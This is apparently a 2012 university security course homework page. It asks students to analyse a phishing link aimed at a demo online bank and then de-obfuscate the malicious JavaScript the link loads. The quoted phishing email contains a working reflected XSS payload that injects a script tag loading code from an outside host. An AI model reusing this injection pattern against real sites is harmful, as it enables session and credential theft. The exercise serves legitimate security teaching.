ITX8063:Homework
Homework
Submission deadline passed
Update (10 Jan): Deadline passed, new submissions are not accepted any more.
Introduction
- Goal: to get hands-on experience with a web-based exploit.
- The homework is based on examples taken from an actual Intrusion Detection System.
- Expected solving time: up to 1 hour.
- Deadline: 9 January 2012
- Tools: a general text editor and Mozilla Firefox (stable and still supporter version) with extensions of your choice should be enough. Do not use any scanners!
- Scoring: up 15 points. Cheaters will get their overall course score multiplied by 0.
- Questions regarding the homework should be sent to mait.peekma[=at=]eesti.ee
Task
You are working as a security specialist at AltoroMutual bank. The internetbank login page of AltoroMutual is located at http: //demo.testfire.net/bank/login.aspx
Today morning, numerous AltoroMutual customers received a phishing e-mail:
From: altoromutual@usa.com To: gmail@chucknorris.com Subject: Verify your details Dear Chuck, Please login to the i-bank and verify all your contacts: http://demo.testfire.net/bank/login.aspx?uid=%22%3E%3Cscript%20src=%22http://m11t.com/itx8063/j.php%22%3E%3C/script%20t=%22#PHPSESSID=s8SdVmZpRQ Best Regards, AltoroMutual Bank
Your first task is to find out what happens if you open that link.
- NB! The exploit works only in Mozilla Firefox and only if NoScript and other anti-XSS extensions are turned off.
- The exploit dissapears if you click on any of the links or buttons on that page.
As a security specialist, you know that web exploits try to hide their source code with obfuscation. Obfuscated code has the same functionality that its original form, but it is not human readable. Fortunately, all Javascript obfuscation methods can be easily reversed (Google for "javascript unpack" or "javascript decompress"). Your second task is to de-obfuscate the script. After de-obfuscating it, you will find out that there is another layer of obfuscation. Your third task is to de-obfuscate the second layer. You have to end up with a completely human readable JavaScript code.
Reporting
You will soon go to a 2 week vacation and your colleague Steven S. will take over your work. Write a memo to Steven S. with the following:
- explaination what malicious happens if a customer opens the link (with Mozilla Firefox) and logs in to the internetbank
- the JavaScript source code after the first de-obfuscation and a short explanation how you de-obfuscated it
- the human-readable JavaScript source code after the second de-obfuscation and a short explanation how you did it
- include your public IP-address (http://www.whatsmyip.net) that you used while your analysis
- Update (08 Dec): info from Steven S: he speaks only English.
- Update (22 Dec): Steven S does not have any Office suite installed. Send the memo as plaintext or PDF.
Send a copy of the memo to mait.peekma[=at=]eesti.ee